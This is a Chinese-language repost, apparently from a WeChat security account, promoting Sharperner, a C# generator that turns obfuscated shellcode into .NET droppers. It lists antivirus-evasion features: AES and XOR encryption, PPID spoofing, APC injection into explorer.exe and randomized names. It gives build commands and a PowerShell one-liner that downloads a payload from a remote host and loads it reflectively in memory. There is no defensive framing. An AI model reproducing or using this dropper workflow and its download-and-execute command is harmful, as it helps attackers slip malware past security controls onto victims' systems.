Sharperner是一个用 CSharp 编写的工具,它使用 AES 和 XOR 混淆的 shellcode 生成 .NET dropper生成的可执行文件可能可以绕过签名检查。
PE
-
PPID欺骗
-
随机生成的 AES 密钥和 iv
-
最终的 Shellcode、Key 和 IV
.NET
-
AES + XOR 加密的 shellcode
-
APC 进程注入 (explorer.exe)
-
随机函数名
-
随机生成的 AES 密钥和 iv
-
最终的 Shellcode、Key 和 IV
使用方法
/file B64,hex,raw shellcode
/type cs,cpp
/out Output file Location (Optional)
Example:
Sharperner.exe /file:file.txt /type:cpp
Sharperner.exe /file:file.txt /out:payload.exe
生成的 .NET 可执行文件可以使用 powershell 反射加载
$data = ( New-Object System.Net.WebClient).DownloadData( ' http://10.10.10.10/payload.exe ' )
$assem = [ System.Reflection.Assembly ]::Load( $data )
[ TotallyNotMal.程序]::Main()
项目地址
https://github.com/aniqfakhrul/Sharperner/releases/tag/0.1
本文始发于微信公众号(Khan安全攻防实验室):Sharperner - Shellcode生成器
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论